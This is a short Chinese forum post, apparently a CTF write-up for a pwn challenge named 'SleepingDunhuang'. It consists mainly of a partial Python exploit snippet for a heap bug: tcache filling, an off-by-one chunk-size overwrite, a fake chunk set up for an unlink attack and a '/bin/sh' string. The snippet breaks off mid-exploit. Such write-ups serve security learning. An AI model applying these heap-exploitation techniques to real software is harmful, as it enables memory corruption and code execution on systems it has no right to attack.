-
-
[原创]SleepingDunhuang WP
-
发表于:
2019-6-26 11:58
5858
-
这道题拿了一血。看su的wp说是改题了,我也不清楚什么时候改的。
做题时间有点久了,忘了题目是什么内容了,直接上关键的wp吧。
heap_addr = add(31, 'A' * 0x27)
print 'addr ', hex(heap_addr)
add(1, 'A' * 0x27)
for i in range(7):
add(2 + i, 'A' * 0x27)
add(9, 'A')
add(10, '/bin/sh\x00')
for i in range(7):
free(2 + i)
free(31)
for i in range(7):
add(2 + i, 'A' * 0x20 + p64(0xC0) + p8(0xC1))
add(31, p64(0) + p64(0x21) + p64(0x404178 - 0x18) + p64(0x404178 - 0x10) + p64(0x20) + p8(0xC0))
for i in range(6):
free(2 + i)
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
